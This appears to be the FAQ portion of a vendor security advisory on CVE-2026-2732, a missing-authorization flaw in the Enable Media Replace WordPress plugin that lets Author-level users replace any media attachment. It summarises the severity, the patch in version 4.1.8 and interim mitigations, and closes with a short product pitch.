A CVSS score of 5.4 suggests that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access and modification of media files, potentially impacting site integrity.
How does the proof of concept demonstrate the issue?
Understanding the exploitation method
The proof of concept illustrates how an attacker can authenticate as an Author user and send crafted requests to replace any media attachment. This demonstrates the lack of authorization checks that allow for unauthorized modifications.
What changes were made in the patched version?
Improvements in version 4.1.8
In version 4.1.8, the plugin was updated to include proper authorization checks in the RemoveBackgroundViewController.php file. These checks ensure that only users with the appropriate permissions can modify attachments.
What should I do if I cannot update the plugin immediately?
Temporary measures
If you cannot update the plugin immediately, consider restricting access to the WordPress admin area or limiting user roles until the patch can be applied. Additionally, monitor for any suspicious activity related to media attachments.
Are there any other vulnerabilities related to this plugin?
Broader security considerations
While CVE-2026-2732 is a specific vulnerability, it is essential to keep the Enable Media Replace plugin and all other plugins updated to mitigate potential security risks. Regularly review security advisories for any new vulnerabilities.
How can I stay informed about vulnerabilities like CVE-2026-2732?
Staying updated on security
To stay informed, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the National Vulnerability Database (NVD) or other security advisories related to WordPress plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations